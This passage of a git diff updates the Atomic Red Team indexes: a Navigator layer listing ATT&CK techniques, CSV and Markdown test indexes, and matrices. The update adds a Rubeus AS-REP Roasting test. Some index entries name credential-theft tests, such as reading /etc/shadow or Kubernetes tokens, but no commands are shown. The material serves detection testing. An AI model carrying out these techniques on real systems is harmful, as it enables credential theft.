{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1572","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index b49f990a..85b3626e 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -1,6 +1,7 @@
 Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
 credential-access,T1003.008,/etc/passwd and /etc/shadow,1,Access /etc/shadow (Local),3723ab77-c546-403c-8fb4-bb577033b235,bash
 credential-access,T1003.008,/etc/passwd and /etc/shadow,2,Access /etc/passwd (Local),60e860b6-8ae6-49db-ad07-5e73edd88f5d,sh
+credential-access,T1558.004,AS-REP Roasting,1,Rubeus asreproast,615bd568-2859-41b5-9aed-61f6a88e48dd,powershell
 credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
 credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
 credential-access,T1552.007,Container API,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 79e806ce..50d5465f 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -1,4 +1,5 @@
 Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
+credential-access,T1558.004,AS-REP Roasting,1,Rubeus asreproast,615bd568-2859-41b5-9aed-61f6a88e48dd,powershell
 credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
 credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
 credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index cfa4b82f..df1ee3c0 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -4,7 +4,8 @@
   - Atomic Test #1: Access /etc/shadow (Local) [linux]
   - Atomic Test #2: Access /etc/passwd (Local) [linux]
 - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1558.004 AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1558.004 AS-REP Roasting](../../T1558.004/T1558.004.md)
+  - Atomic Test #1: Rubeus asreproast [windows]
 - [T1552.003 Bash History](../../T1552.003/T1552.003.md)
   - Atomic Test #1: Search Through Bash History [linux, macos]
 - T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index d0f286c9..3b558504 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -1,7 +1,8 @@
 # Windows Atomic Tests by ATT&CK Tactic & Technique
 # credential-access
 - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1558.004 AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1558.004 AS-REP Roasting](../../T1558.004/T1558.004.md)
+  - Atomic Test #1: Rubeus asreproast [windows]
 - T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1003.005 Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md
index 089d1b3c..b79bc8fe 100644
--- a/atomics/Indexes/Matrices/matrix.md
+++ b/atomics/Indexes/Matrices/matrix.md
@@ -3,7 +3,7 @@
 |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
 | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) |
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AS-REP Roasting](../../T1558.004/T1558.004.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
 | [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Add-ins](../../T1137.006/T1137.006.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
 | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md
index b6954e19..64ecf50a 100644
--- a/atomics/Indexes/Matrices/windows-matrix.md
+++ b/atomics/Indexes/Matrices/windows-matrix.md
